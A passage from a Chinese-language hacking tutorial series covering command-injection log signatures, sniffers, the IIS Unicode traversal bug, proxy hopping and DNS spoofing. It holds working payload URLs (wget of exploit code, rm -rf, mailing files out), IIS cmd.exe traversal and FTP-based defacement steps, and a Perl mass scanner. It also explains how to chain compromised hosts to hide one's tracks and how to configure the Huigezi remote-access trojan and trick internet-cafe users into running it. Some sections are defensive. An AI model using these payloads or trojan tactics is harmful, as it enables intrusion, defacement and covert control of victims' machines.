http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al|
http://host/cgi-bin/bad.cgi?doh=ls%20-al;
'cmd.exe'
这是一个windows的shell,一个攻击者如果访问并运行这个脚本,在服务器设置允许的条件下可以在windows机器上做任何事情,很多的蠕虫病毒就是通过80端口,传播到远程的机器上
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
'/bin/id'
这是个2进制的文件,它的问题和/bin/ls一样,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。
它将显示属于哪个用户和属于哪个组
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;
'/bin/rm'
这个命令可以删除文件,如果不正确的使用是非常危险的
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
'wget and tftp' 命令
这些命令常被攻击者用来下载可能进一步获得特权的文件,wget是unix下的命令,可能被用来下载后门程序,tftp是unix和nt下的命令,用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c;
'cat' 命令
这个命令用来查看文件内容,常用来读重要的信息,比如配置文件,密码文件,信用卡文件和你能够想到的文件
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
'echo' 命令
这个命令常用于写数据到文件中,比如“index.html”
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20'fc-#kiwis%20was%20here'%20>>%200day.txt| http://host/cgi-bin/bad.cgi?doh=echo%20'fc-#kiwis%20was%20here'%20>>%200day.txt;
'ps' 命令
列出当前运行的进程,告诉攻击者远程主机运行了那些软件,以便从中得到一些安全问题的主意,获得进一步的权限
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux| http://host/cgi-bin/bad.cgi?doh=ps%20-aux;
'kill and killall' 命令
在unix系统这个命令用于杀掉进程,一个攻击者可以用这个命令来停止系统服务和程序,同时可以擦掉攻击者的痕迹,一些exploit会产生很多的子进程
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200| http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;
'uname' 命令
这个命令告诉攻击者远程机器的名字,一些时候,通过这个命令知道web站点位于哪个isp,也许是攻击者曾今访问过的。通常uname -a来请求,这些都将记录在日志文件中
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a| http://host/cgi-bin/bad.cgi?doh=uname%20-a;
'cc, gcc, perl, python, etc...' 编译/解释命令
攻击者通过wget或者tftp下载exploit,并用cc,gcc这样的编译程序进行编译成可执行程序,进一步获得特权
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337;
如果你查看日志中发现有“perl” python”这些说明可能攻击者下载远程的perl ,python脚本程序,并试图本地获得特权
'mail' 命令
攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱,也肯能是进行邮件炸弹的攻击
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@****cnhonker.org%20<
第20章
sniffer,今天开始说它了
sniffers(嗅探器)几乎和internet有一样久的历史了.他们是最早的一个允许系统管理员分析网络和查明哪里有错误发生的工具.但是这个工具也给我们带来很大的方便。今天我们看2个问题:1。什么是sniffer 2。如何防止sniffer的监听。似乎是矛盾的哦,呵呵,要2个方面都知道才能百战百胜嘛
什嘛是sniffer (抄定义的)
在单选性网络中, 以太网结构广播至网路上所有的机器, 但是只有预定接受信息包的那台计算机才会响应.不过网路上其他的计算机同样会"看到"这个信息包,但是如果他们不是预定的接受者,他们会排除这个信息包.当一台计算机上运行着sniffer的时候并且网络处于监听所有信息交通的状态, 那么这台计算机就有能力浏览所有的在网络上通过的信息包.(这个当然很爽了)
那你就有个问题谁使用这个呢?lan/wan 管理员使用sniffers来分析网络信息交通并且找出网络上何处发生问题.一个安全管理员可以同时用多种sniffers, 将它们放置在网络的各处,形成一个入侵警报系统.对于系统管理员来说sniffers是一个非常好的工具,当然还有我们大家了。那常见的sniffers 有哪些呢?很多,我常用的有Sniffer Pro。当然看一些文章介绍了snoop,但注意这是在UNIX下的,我没怎么用 过 ,所以就不说这个了。至于其他一些好用的,我想你学到现在了应该可以自己找了(上GOOGLE 或是BAIDU都可以,不然去www.yahoo.com也不错的)。
那怎么防止sniffer的监听?
显而易见的,保护网络不受sniffer监听的方法就是不要让它们进入.如果一个人不能通过你的系统进入的话,那么他们无法安装sniffers.当有人看上一个大多数网络通讯流通的中心区域(防火墙或是代理服务器)时,他们便确定这是他们的攻击目标并将被监视.一些可能的"受害者"在服务器的旁边,这时候个人信息将被截获(可能是各种信息甚至是密码)
一个好的方式来保护你的网络不受sniffer监视是将网络用以太网接线器代替普通的集线器分成尽可能多的段.接线器可以分割你的网络通讯并防止每一个系统"看到"每个信息包.坏处是这种东西太贵了,这个还是很重要的
另一个方法是,和那种接线器比就是加密术.Sniffer依然可以监视到信息的传送,但是显示的是乱码.但这个有问题就是网络会延迟,当然还有速度问题和使用一个弱加密术比较容易被攻破。
用一些软件也可以帮助你查出是不是有人在监视你,比如AntiSniff(很小的,但可以扫描你的网路并测试一台计算机是否运行在混杂模式(监听网路上每个数据包)什么意思?你看看上面的类容吧),下载:http://www.pdasky.com.cn/down.asp?id=2876&no=1
大家请注意,从今天开始我们就开始接触网络监听的内容,明天我讲的是各种网络监听技术,因为今天很晚了,所以。。还有就是这2天的内容可能牵涉到一些名词,我一般都会注解的(因为要照顾所有人嘛),但有的如果我没有注解的但你又不太明白的话,请到网络技术板块发贴,我会作出解答,请不要在此后跟贴。
第21章
网络监听技术分析?纯属理论
今天我们先说几个基本概念.首先,我们知道,一台接在以太网内的计算机为了和其他主机进行通讯,在硬件上是需要网卡,在软件上是需要网卡驱动程序的。而每块网卡在出厂时都有一个唯一的不与世界上任何一块网卡重复的硬件地址,称为mac地址。同时,当网络中两台主机在实现tcp/ip通讯时,网卡还必须绑定一个唯一的ip地址.
对我们来说,浏览网页,收发邮件等都是很平常,很简便的工作,其实在后台这些工作是依*tcp/ip协议族实现的,大家知道有两个主要的网络体系:OSI参考模型和TCP/IP参考模型,OSI模型即为通常说的7层协议,它由下向上分别为物理层、数据链路层、网络层、传输层、会话层、表示层、应用层,而tcp/ip模型中去掉了会话层和表示层后,由剩下的5层构成了互联网的基础,在网络的后台默默的工作着。
当局域网内(因为我们最常见的就是局域网)的主机都通过HUB等方式连接时,一般都称为共享式的连接(就是大家长说的共享),这种共享式的连接有一个很明显的特点:就是HUB会将接收到的所有数据向HUB上的每个端口转发,也就是说当主机根据mac地址进行数据包发送时,尽管发送端主机告知了目标主机的地址,但这并不意味着在一个网络内的其他主机听不到发送端和接收端之间的通讯,只是在正常状况下其他主机会忽略这些通讯报文而已!如果这些主机不愿意忽略这些报文,网卡被设置为promiscuous状态的话,那么,对于这台主机的网络接口而言,任何在这个局域网内传输的信息都是可以被听到的。如果网卡被设置为为混杂模式(promiscuous),主机将会默不作声的听到以太网内传输的所有信息,也就是说:窃听也就因此实现了!
对发生在局域网的其他主机上的监听,一直以来,都缺乏很好的检测方法。这是由于产生网络监听行为的主机在工作时总是不做声的收集数据包,几乎不会主动发出任何信息。但可惜的有些大虾们就爱动脑筋啊,现在已经有些方法了
1:反应时间
向怀疑有网络监听行为的网络发送大量垃圾数据包,根据各个主机回应的情况进行判断,正常的系统回应的时间应该没有太明显的变化,而处于混杂模式的系统由于对大量的垃圾信息照单全收,所以很有可能回应时间会发生较大的变化。这个方法很好,但有时候也没用因为大家没经验嘛
2:观测dns
许多的网络监听软件都会尝试进行地址反向解析,在怀疑有网络监听发生时可以在dns系统上观测有没有明显增多的解析请求。没DNS的或者不能接触的就有点郁闷了
3:利用ping模式进行监测
这个方法我不怎么知道,看了一些文章就COPY了一下,有点头晕,但应该能看懂:假设我们怀疑的主机的硬件地址是00:30:6E:00:9B:B9,它的ip地址是192.168.1.1,那么我们现在伪造出这样的一种icmp数据包:硬件地址是不与局域网内任何一台主机相同的00:30:6E:00:9B:9B,目的地址是192.168.1.1不变,我们可以设想一下这种数据包在局域网内传输会发生什么现象:任何正常的主机会检查这个数据包,比较数据包的硬件地址,和自己的不同,于是不会理会这个数据包,而处于网络监听模式的主机呢?由于它的网卡现在是在混杂模式的,所以它不会去对比这个数据包的硬件地址,而是将这个数据包直接传到上层,上层检查数据包的ip地址,符合自己的ip,于是会对对这个ping的包做出回应。这样,一台处于网络监听模式的主机就被发现了。
4:利用arp数据包进行监测
这个方法和上面的差不多,它使用arp数据包替代了上述的icmp数据包而已,向局域网内的主机发送非广播方式的arp包,如果局域网内的某个主机响应了这个arp请求,那 么我们就可以判断它很可能就是处于网络监听模式了,这是目前相对而言比较好的监测模式。
(什么叫ARP?就说ARP协议,它是Address Resolution Protocol”(地址解析协议)的缩写,在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的.所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。)
昨天有些朋友说找不到一些网络监听的工具,你在www.google.com搜sniffer tools有很多的.
我就列举一些了
Windows平台下的:
Windump http://www.xfocus.net/tools/200108/238.html
相关介绍:http://security.zz.ha.cn/windump.html
注意这个是在NT下用的98就别用了,说到这想说一局如果你的系统是98或是ME的,最好换一个,因为好多很好的软件都要求是NT的
UNIX下:
Sniffithttp://www.programsalon.com/download.asp?type_id=53??第6个
该软件的安装介绍:http://www.xfocus.net/articles/200001/28.html
第22章
IIS5 UNICODE 编码漏洞
前2天一直在讲网络监听,虽然我觉得很有必要,但好多人都发来消息说没什么太多兴趣。虽然还是很想讲这个,但因为大家有意见,就不说。经过快半个月的学习,我想如果你很认真的在看的话的,我想你的基本功已经很好了.今天开始我会开始由一些详细的攻击或其他的方法开始说了,有些地方我就不详细说明了,如果有问题可以发贴来问
回到话题,unicode 漏洞是最容易让入侵者得手的一个漏洞,可以不费吹灰之力将主页改掉,重则删除
硬盘上的数据,高手甚至获取administrator 权限!
漏洞自大前年年10 月份公布至今,居然国内还有这么多的服务器存在着该漏洞
下面我从一般的入侵手法分析如何做相应的防护对策.
(一)unicode 漏洞的原理
有关漏洞的原理网上已经有很多相关的文章了,我不打算详细说,还是简单的来了解了解
好了!
实际上就是UNICODE 编码存在BUG,在UNICODE 编码中
%c1%1c -〉(0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉(0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
在NT4 中/编码为%c1%9c .在英文版里:WIN2000 英文版%c0%af
该漏洞是利用扩展UNICODE 字符取代"/"和"\"而能利用"../"目录遍历,故在一台有
unicode 漏洞的服务器ip 后边加上/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\就可
以看到主机上c 盘的所有文件及目录.
(二)unicode 漏洞的危害
未经授权的用户可能利用IUSR_machinename 账号的上下文空间访问任何已知的文件。
该账号在默认情况下属于Everyone 和Users 组的成员,因此任何与Web 根目录在同一逻辑
驱动器上的能被这些用户组访问的文件都能被删除,修改或执行,就如同一个用户成功登陆
所能完成的一样。
以上部分内容摘自绿盟!
(三)unicode 漏洞的攻击手法
1、利用漏洞修改主页
这可能是新手们最兴奋的事情了!每当他们成功地黑掉一个网页后都有一股极大的满足
感.然而黑网页也是最简单的事情。
手段描述一:入侵者先用扫描工具扫到有漏洞的主机后,在IE 的地址栏里输入http://主机
的ip/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\就可以看到主机上c 盘的所有文件
了.要查主页放在什么地方的话,可以将后边的dir+c:\换成set ,从返回的错误信息中找到
PATH_TRANSLATED=c:\inetpub\wwwroot 这一句(具体的路径根据具体的情况而定).其中的
c:\inetpub\wwwroot 就是主页所在的地方!接着入侵者为了避免系统对特殊字符的检测,故将
本地机器的CMD.EXE 程序复制到主机的c:\inetpub\scripts 目录中,这样干起活来就容易多了!
他们查到主页的名字后,就可以利用echo 命令来写入信息,将内容覆盖掉主页文件就把主页
给黑了。
手段描述二:除了上面的土方法外,入侵者可以将有声有色的黑页替换主页,这样黑得不是
更爽吗?来看看他们是如何做到的。
先在本地硬盘建立个共享文件夹(如gale),把黑页复制进去。照样把cmd.exe 拷贝到目标
的c:\inetpub\scripts 下,名字为gale.exe,映射本地的gale 目录为目标的一个盘(如q:)
把q:里的复制到目标主机的网页目录去。覆盖对方的网页文件,最后断开映射就可以了.
这是利用本地共享目录和映射硬盘的方法替换黑页,如果黑页有背景又有音乐,文件很大,上
传费事,怎么完美一点呢?请看下边。
手段描述三:这种方法也是红客们黑美国、日本的时候最常用的手法。
入侵者先申请一个免费空间,把做好的黑页上传上去,然后利用echo 命令在目标主机
上建立一个文本文件,写上几行命令,如下:
目标主机ip/scripts/gale.exe?/c+echo+open+你黑页所在的免费空间ip>文本文件名.txt
目标主机ip/gale.exe?/c+echo+你在黑页空间上的帐户>>文本文件名.txt
目标主机ip/gale.exe?/c+echo+密码>>文本文件名.txt
目标主机ip/gale.exe?/c+echo+get+index.htm>>文本文件名.txt
目标主机ip/gale.exe?/c+echo+bye>>文本文件名.txt
目标主机ip/gale.exe?/c+ftp+-s:文本文件名.txt
这样入侵者就可以将黑页从另外一个空间下载到目标主机上,copy 过去覆盖就可以了。
这样入侵者不受地方的限制,随便什么地方了,比如网吧。
(四)unicode 漏洞的防护措施
说了那么多,现在该转入正题了,下面我来说说防范的措施,这也是从攻击中总结出来
的一些措施,希望对大家有帮助。
1、打上最新补丁
作为一个网络管理员,为了服务器的安全,需要不停的打上最新补丁,这是比较有效的
方法。但你要记住:在网络上,没有绝对的安全的,道高一尺,魔高一丈,完全相信防火墙和系
统补丁往往是很愚蠢的。
2、冷酷到底,拒人于千里之外
相信到现在还利用unicode 漏洞入侵的人都是些新手傻瓜们!他们没有确定的入侵目标,
只是抓个扫描器来乱扫一通,扫到就黑,扫不到就哭的那种。对付扫描器扫出未知的漏洞,
这是管理员的聪明之处。如何躲过扫描器的眼睛呢?请先看看下面一个用perl 写的扫描器代
码吧:
#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room.
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole
#it checks for both %c0%af and %c1%9c (其他版本的请修改这样的字符)
#perhaps a public script to do some evil stuff with this exploit later...h0h0h0
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for researching the hole =]
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @host;
print "root shell hackers\n";
print "iis cmd hole scanner\n";
print "coded by piffy\n";
print "\nWhat file contains the hosts: ";
chop (my $hosts=);
open(IN, $hosts) || die "\nCould not open $hosts: $!";
while ()
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "ph34r, scan started";
while ($a < $b)
{
my $url="http://$host[$a]/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
&second()
}
sub second() {
my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}
代码摘自绿盟。
不知道大家注意到上面长长的两行$url 和$url2 了没有,其实只是简单的字符串处理而
已。于是有以下几种方法避过扫描器的扫描:
①更改winnt 目录名
安装winnt 或者win2000 时,缺省目录是c:\winnt.可以把这个目录名改成别的目录名,
这样扫描器递交"http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\"类似的
url 时就会返回"找不到该页"的信息。这样大部分扫描器就成失灵了。(不知道小榕的流光能
不能躲得过,但大部分的用perl 写的扫描器经这样改了之后都不起作用了)。
安装前就可以这样,但是已经安装了,确实不想改winnt/2000 的目录怎么办呢?那好,可以
看看下边的:
②更改cmd.exe 和各常用命令的名称
更改cmd.exe 的名称也可以达到同样的效果,而且更加可*,假如你只更改winnt/win2000
所在的目录名的话,别人猜对后仍然可以黑掉你。同时把一些不常用的而且有危害的命令改
成只有你知道的名字,①和②结合的话更完美!
③改变web 目录位置
通常主页所在的位置是在C:\InetPub\wwwroot 里。在c:\inetpub 里有scripts 之类的目录。
如果你不需要他们的话,你可以把web 目录转移到别的分区,比如e:\netroot 然后把C:\inetpub
整个删除掉.日本有一台主机就做的比较好,它的机器明明存在有unicode 漏洞,但将web 目录
转移到d 盘,并且d 盘是不可写的,有位新手在QQ 上向我抱怨说:"老大!你说的方法不行呀,
我黑不了!呜呜呜~~",哈!象这样,一般的人就难以修改主页了,(注意:这只能防止一般的人,高
手只要动动脑筋,照样能黑掉!).
④停止不必要的服务
在internet 服务器中,为了系统的安全,您必须停掉所有的缺省web 目录的服务。然后统统
删掉,只保留你所要的,以免招来后患.
⑤改变服务的端口号
在保证不影响访问率的情况下,我们可以把web 服务的端口由80 改成别的,比如108。
因为很多还是利用unicode 漏洞攻击的人一般都是新手,他们都是拿一个扫描工具扫一个ip
段的,这样做就可以躲避那种扫描一段网段的攻击者的扫描了。(注意:此方法只能防止这种方
式的扫描,别有用心的攻击者照样可以通过修改扫描器的插件来实行扫描的.但受攻击的可能
性已经减低.)
3、限制iusr_server 的权限
上面所说的措施是把攻击者拒绝于门外,如果真的很不幸,给攻击者找到门上来了,那
不是死定了?不一定!攻击者利用UNICODE 漏洞遍历目录时的用户权限是决定于
iusr_server 的权限的,而通常iusr_server 是属于guest 组的。我们只要进一步限制iusr_server
的权限还有可能挽回(对于高手们就不一定这么说了)。
建议如下:采用NTFS 格式的文件系统,将web 目录外所有的访问权限设置为:用户
iusr_server 不可访问!注意:不要给iusr_server 对web 目录有写权限!理由是什么大家都很
清楚!你的主页就是给这样的家伙给黑的,如果他没有写的权限,就象那台日本的主机一样,
一般的新手们就难以下手了。(但是,那些确实是非写不可的地方,如:聊天室或论坛,是
可以适当放开的)。
4、偷吃成功,寻找蛛丝马迹
这就是分析访问日志,一名合格的管理员,应该有经常查看日志的好习惯.日志是非常的
多的,看起来很麻烦,但对于unicode 漏洞的攻击,只要查看分析web 服务的访问日志就可以
了。扫描器的扫描和已经攻击完了的动作都会被记录下来,要注意特别留意出现的"cmd.exe"
字眼。
最后,我建议:
①管理好你的admin 帐户和密码
因为现在的黑客新手们虽然是冲着unicode 漏洞而来,但他们的师父们往往推荐他们用小
榕的流光,这是一个强大的漏洞扫描工具.在扫描的过程中,脆弱的管理员帐户和密码(如:帐
户:admin 密码:1234)很容易被猜中,给他们带来了以外的收获.无论怎么强大,流光也是*黑
客字典来暴力破解的,只要你密码复杂就可以避免猜中.长度最好超过8 位,大小写和复杂字符
同时出现,如:g&A$l#e7 这样的密码就很难被猜中,当然,也许我这是废话。现在出现弱口令的机会是不多了
②经常更改管理员的密码
保证只有你自己一个用户出现在管理员组,经常检查有没有可疑的用户。一般的新手都是
学着别人教的招数,在管理员组里增加一个用户,留作后门.从入侵的角度来说,这是很危险的
做法,但作为管理员不可能没有发现的,(那要看管理员的素质如何了)。
第23章
跳板的故事
跳板,这里的不是指跳水的扳子(废话),我想大家多跳板都应该有个基本的认识:就是通过这个东西跳过什么东西,掩盖什么东西。给大家个图大家就明白跳板是什么了
此主题相关图片如下:
知道了吧,就是隐藏你的足迹,想要找出你,就必须连接x个你所通过的机器,并且找出他们的log,如果碰巧有一个没有记录,线就断了:),即使都记录了,log里面登记的IP也是上一级跳板主机的IP…
当然跳板还可以用于:
.QQ或者ICQ
.ftp客户端
.mail客户端
.telnet客户端
.端口扫描器
.(以及几乎所有在网络中所使用的工具)
想想如果不要跳板我们不是很危险吗?
这可能不适用于某些IRC服务器,因为它们常常查看打开着的wingates及proxies。
先说简单的windows下的sock代理怎么做
一.找一些运行wingate的主机
原因:因为wingates的默认安装打开端口1080并且不记录socks连接。
怎么找这些机子呢?你可以用‘代理猎手’,好象中国人都用这个,国外人好象喜欢用wingatescan,或是从这里可以找到最新的:http://www.cyberarmy.com/lists/wingate(国外的,我建议大家用国外的,因为追查有难度啊)
二.确认列表中的主机的确运行着wingate
三.安装一个能截取发送的信息包的软件
我使用的是一个叫purpose的工具,你可以从
http://www.buffy.nu/article.php3?id_article=3043
要设置它,只要在socks server填上: 127.0.0.1 port 8000.
选择'socks version 5'.再点击'resolve all names remotely'.
不要选'supported authentication'。
在主界面,选择new然后建立一个你希望socks支持的程序的快捷方式
对所有你想匿名的程序做同样的工作,至于有哪些你就自己想了
四.安装socks chainer
从http://www.ufasoft.com/socks下载该工具
在service菜单, 点击new。在name段输入Chain,port则输入8000。
点击new 并且将你找到最快的wingates的IP填进去,端口则填1080。
使用 '<' 和 '>', 你可以添加或者移除socks.记得一定要在使用前测试所有的socks.
五.测试你的设置
用你所建立的浏览器的快捷方式打开浏览器,连接到
http://cavency.virtualave.net/cgi-bin/env.cgi或者
http://internet.junkbuster.com/cgi-bin/show-http-headers
同样,打开你的telnet客户端并尝试telnet到
ftp.cztc.edu.cn
你可以通过https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py来检测SSL或者
FTP到ftp.zedz.net——或者其它的FTP来验证你的IP。
在上面的测试中,远程主机上留下的将是你最后一个chain的IP地址。当然你可以在自己的
网络里进行测试……
再说说另一种吧SkSockServer“(下面称SSS)
这个与上面的利用著名的wingate做的有什么区别?
1/ 普通的Sock代理程序不支持多跳板之间的连续跳,而SSS却可支持最多达255个跳板之间的连跳运动
2/ 普通的Sock代理程序之间的数据传输是不加密的,而SSS支持的跳板之间传输的数据是经过动态加密的,也就是说每次传输过程中,数据加密的方式都不相同。就算你不幸在..的过程中被webmaster发现,普通的sock代理程序将会被webmaster用sniffer把你的信息一览无遗,而恰巧你用的是SSS的话,呵呵~他将会看到一堆乱码
3/普通的sock代理程序在设置上比较烦琐,而SSS只用两步就全都ok了。(具体步骤将在下面说明) 普通的sock代理程序要不然只支持Tcp或Udp的连接,很少有二者兼顾的,而SSS却全部支持
下面是一个大哥写的教程我觉得不错,就COPY一下了
找A机上传SSS文件,(怎么找我想你应该有个肉鸡吧)如果权限足够的话,应该可以完成SSS的安装和启动。所示:
SSS命令参数的说明:
-install 在NT机上安装SSS
-remove 移除SSS.
-debug 呵呵~snake进行debug用的,对于咱们老百姓来言无用。
sksockserver –install 安装sksockserver。
net start skserver 启动skserver服务。:(注意:这可是在A机上运行的,可不是你自己的爱机)
Ok啦~A机跳板完成,下面进行B机跳板的安装:
打开终端服务客户端连上找到的B菜机。
用B菜机的IE直接下载SSS~~呵呵~如图2:(IP地址隐去啦~大家自己找菜机吧)
图2
在B菜机上配置sockservercfg(因为是用vc编写的sockservercfg,所以必须有mfc的库文件,如果出现“无法定位序数XXXX于动态连接库mfc42.dll”的话,大家可以在自己的机子上找找,最终上传到B菜机的路径:X:\winnt\system32)
sockservercfg图例说明:分见图3、图4、图5:
此主题相关图片如下:
此主题相关图片如下:
此主题相关图片如下:
图例说明:
图3:SSS的配置界面一:在名称处可以填上任意的程序说明,以方便糊弄网管。要注意三处画红圈处,分别为:程序在开机时自动启动(我第一次用的时候还以为是给SSS自动分配端口~哎~Snake!So lazy!~)、安装服务、启动服务。
图4:SSS的配置界面二:是对client端进行限制的配置(呵呵~大家讲点义气,就别做限制啦)
图5:SSS的配置界面三:重要的地方哟!在IP处填入刚才做好的A菜机的Ip地址;激活bActive处(哎~什么叫bActive呀~就不会多作一个取消的?Snake!!!Too too lazy!);之后点Add.
最后提醒一句别忘了点确定哟
ok啦~大功告成!再向大家推荐最后一个好东东-SocksCap(你可以在这找到:http://www.youngzsoft.com/cn/sockscap/)。在自己的机子上装好SocksCap后,设定用Sock5代理的IP地址(就是A菜机的地址),在SocksCap下运行程序,例如:telnet,ftp,ntshell,IE。。。。。所有可以上网的程序,呵呵~这样的你就从网络彻底消失啦~~
总结:
这篇文章只讲了两个跳板,同理,只要再设置 C,D,E.....(只要你不嫌麻烦)上的配置,就连跳了n个跳板啦;在设置A机的时候其实最好也用3389登陆设置,这样的话可以自己设定SSS的端口。
如果大家不愿意自己去找代理
本站有个“代理天天更新” 有时间看看啊
第24章
灰鸽子挺进版全攻略和2003版使用心得
灰鸽子(纪念版)不会使用的人还很多,(什么你不知道什么叫灰鸽子?那你知道什么叫冰河或是什么男生什么女生呢?) 灰鸽子还有自己的网站http://main.huigezi.com/main.asp
,今天我们只是简单的说一下它的使用,如果在使用中遇到任何问题除了可以在这里问以外还可以到http://main.huigezi.com/main.asp去看看,一般都没问题的。
挺进版加上了穿过局域网控制内部机器的
功能,又是第一个使用域名来储存客户端IP地址的,灰鸽子(挺进版)文件:
P_Client.exe (客户端文件)
Server.exe (服务端文件,如果你想控制对方就可以配置一下,让对方运行,你就可以用客户端控制他了!)
程序界面(P_Client.exe):
此主题相关图片如下:
看了上面界面的注示,是不是有了一个底!那好我们就来一次“自动上线”式的控制吧!
注册域名:
在配置服务器程序之前,如果你没有域名可用的话,请随我来注册一个免费的域名吧!
1.点击工具栏上的第三个按扭!在程序界面里的图片上注明了注册域名、更新IP到域名、主机搜索的那个按扭!
此主题相关图片如下:
按了按钮后你会看见上面的界面了,看到了“注册域名”了吧!
点击“注册域名”选项卡!你会看见下面的界面!
此主题相关图片如下:
好的,现在我们就来注册一个域名吧!可以点击“.126.com”来改变申请域名的后缀,这里不我们不点击,保持不变!
现在我们填好域名、密码、E-Mail,就可以按注册域名按扭了!(在这里请确保你已经上网了!)按完成请注意注册结果框里
的提示信息!如果成功的话,大家往下看,注册失败请换个域名试试!
配置服务端程序:
好的,现在大家有了域名了,可以配置服务端程序了!大家在程序界面里看到了配置服务端程序的按扭了吧!就是工具
栏上的第七个按扭!点它就会出现下面的界面!
此主题相关图片如下:
好的,我们点“下一步”继续
此主题相关图片如下:
按上图所说的做吧,好的,我们已经完成了最关键的一步了!
为了节省时间,大家可以一直按“下一步”按扭
好的,我们配置服务器的工作就完成了!
现在我们要的就是把我们配置的“Server.exe”,让
对方运行了(比如说在网吧运行一下)
安装传播已经配置的服务端程序:
好的,我们现在已经把我们刚配置的服务器端程序发给了一个在网吧上网的朋友!现在就看一个怎么控制吧!
等待自动上线:
如果网友已经打开了我们发过去的服务端!应该在一分钟之内自动上线!如果“文件管理器”中多出了绿屏的主机,就是自动上线的主机了!我们选中“文件管理器”中自动上线的主机进行连接!如果不出错的话应可以看到它的驱动器列表了!
哈哈,你不仅可以管理文件,还可以进行其它控制
这就是这个软件的简单应用 很简单吧
再说说灰鸽子2003的一些使用心得吧
2003的界面类似XP,内容方面和这个挺进版差不多,最大的改动就是搜索主机的IPC弱口令探测这个东西去掉了,速度没什么改进,但比辐射版要快不少。
至于使用感受:首先用灰鸽子自己本身得搜索功能还真得难找到一个好的机子,搜索速度太慢了,这时候我们可以用SUPERSCAN这种专业的扫描软件,添好默认的端口,能大大提高效率。还有就是关键在于怎么骗取别人运行自己的服务端。最快的就是先把自己的服务端加载在网页中利用IE的自动下载运行漏洞,反正不会用很对人去升级计算机系统漏洞的。再到各大的论坛说自己有免费的QQ或电影看,贪小便宜的人肯定很多的。
申明:我网站和论坛的页面绝不含任何这种东西或是木马,请大家放心。
第25章
几个DNS问题和网络攻击与防范
现在的Internet上存在的DNS服务器有绝大多数都是用bind来架设的,使用的bind版本主要为bind 4.9.5+P1以前版本和bind 8.2.2-P5以前版本.这些bind有个共同的特点,就是BIND会缓存(Cache)所有已经查询过的结果,这个问题就引起了下面的几个问题的存在.(什么叫BIND?BIND是一款由ISC维护的Internet域名名字系统实现。)
1>.DNS欺骗
在DNS的缓存还没有过期之前,如果在DNS的缓存中已经存在的记录,一旦有客户查询,DNS服务器将会直接返回缓存中的记录.
下面我们来看一个例子:
一台运行着unix的Internet主机,并且提供rlogin服务,它的IP地址为123.45.67.89,它使用的DNS服务器(即/etc/resolv.conf中指向的DNS服务器)的IP地址为98.76.54.32,某个客户端(IP地址为38.222.74.2)试图连接到unix主机的rlogin端口,假设unix主机的/etc/hosts.equiv文件中使用的是dns名称来允许目标主机的访问,那么unix主机会向IP为98.76.54.32的DNS服务器发出一个PTR记录的查询:
123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
IP为98.76.54.32的DNS服务器中没有这个反向查询域的信息,经过一番查询,这个DNS服务器找到38.222.74.2和38.222.74.10为74.222.38.in-addr.arpa.的权威DNS服务器,所以它会向38.222.74.2发出PTR查询:
98.76.54.32 -> 38.222.74.2 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
请注意,38.222.74.2是我们的客户端IP,也就是说这台机子是完全掌握在我们手中的.我们可以更改它的DNS记录,让它返回我们所需要的结果:
38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
